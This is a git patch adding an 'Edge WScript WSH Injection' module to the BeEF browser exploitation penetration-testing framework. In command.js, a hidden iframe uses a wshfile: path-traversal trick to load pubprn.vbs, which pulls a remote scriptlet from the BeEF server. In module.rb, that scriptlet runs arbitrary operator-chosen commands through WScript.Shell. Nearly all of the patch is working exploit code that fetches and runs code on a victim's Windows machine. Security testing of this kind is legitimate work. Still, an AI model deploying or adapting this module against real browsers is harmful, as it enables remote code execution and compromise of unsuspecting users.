From c385b1a352e2d5527a882b0dc9ee2307974faee6 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sat, 30 Mar 2019 00:18:59 +0000
Subject: [PATCH] Add Edge WScript WSH Injection module

---
 .../edge_wscript_wsh_injection/command.js     | 31 ++++++++++
 .../edge_wscript_wsh_injection/config.yaml    | 20 +++++++
 .../edge_wscript_wsh_injection/module.rb      | 60 +++++++++++++++++++
 3 files changed, 111 insertions(+)
 create mode 100755 modules/social_engineering/edge_wscript_wsh_injection/command.js
 create mode 100755 modules/social_engineering/edge_wscript_wsh_injection/config.yaml
 create mode 100755 modules/social_engineering/edge_wscript_wsh_injection/module.rb

diff --git a/modules/social_engineering/edge_wscript_wsh_injection/command.js b/modules/social_engineering/edge_wscript_wsh_injection/command.js
new file mode 100755
index 000000000..6d8c5e09b
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/command.js
@@ -0,0 +1,31 @@
+//
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function(){
+  var timeout = 5;
+
+  if (!beef.browser.isEdge()) {
+    beef.debug("[Edge WScript WSH Injection] Browser is not supported.");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error());
+    return;
+  }
+
+  try {
+    var wsh_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+    var beef_host = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port;
+    wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/en-US/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html');
+  } catch (e) {
+    beef.debug("[Edge WScript WSH Injection] Could not create iframe");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error());
+    return;
+  }
+
+  // clean up
+  cleanup = function() {
+    document.body.removeChild(wsh_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+});
diff --git a/modules/social_engineering/edge_wscript_wsh_injection/config.yaml b/modules/social_engineering/edge_wscript_wsh_injection/config.yaml
new file mode 100755
index 000000000..1f68fa559
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/config.yaml
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+  module:
+    edge_wscript_wsh_injection:
+      enable: true
+      category: ["Social Engineering"]
+      name: "Edge WScript WSH Injection"
+      description: "Prompts the user to run \"Microsoft Windows Based Script Host\" (WScript.exe).<br/><br/>Uses <a href='https://leucosite.com/Microsoft-Edge-RCE/'>wshfile protocol handler</a> technique to load pubprn.vbs and <a href='https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'>WSH injection in pubprn.vbs</a> to execute arbitrary code.<br/><br/>If the user allows execution, a VBS payload is downloaded from BeEF, and the specified commands are executed."
+      authors: [
+        "@qab",       # wshfile protocol handler + traversal technique, and exploit
+        "@enigma0x3", # pubprn.vbs technique and exploit
+        "bcoles"      # BeEF
+      ]
+      target:
+        user_notify: ["E"]
+        not_working: ["ALL"]
diff --git a/modules/social_engineering/edge_wscript_wsh_injection/module.rb b/modules/social_engineering/edge_wscript_wsh_injection/module.rb
new file mode 100755
index 000000000..636bd1f7d
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/module.rb
@@ -0,0 +1,60 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Edge_wscript_wsh_injection < BeEF::Core::Command
+
+  def pre_send
+    payload = ''
+    @datastore.each do |input|
+      if input['name'] == 'payload'
+        payload = input['value']
+      end
+    end
+
+    rand_str = rand(32**10).to_s(32)
+
+    script = <<-EOF
+<?XML version="1.0"?>                                                                                           
+  <scriptlet>
+
+  <registration
+    description="#{rand_str}"
+    progid="#{rand_str}"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+  >
+  </registration>
+
+  <script language="JScript">
+  <![CDATA[
+    var r = new ActiveXObject("WScript.Shell").Run("#{payload.gsub('"', '\\"')}");
+  ]]>
+  </script>
+
+  </scriptlet>
+EOF
+
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
+      {
+        'Content-Type' => 'text/html'
+      },
+      script,
+      "/#{@command_id}/index.html",
+      -1
+    )
+  end
+
+  def self.options
+    return [
+      {'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html")
+  end
+end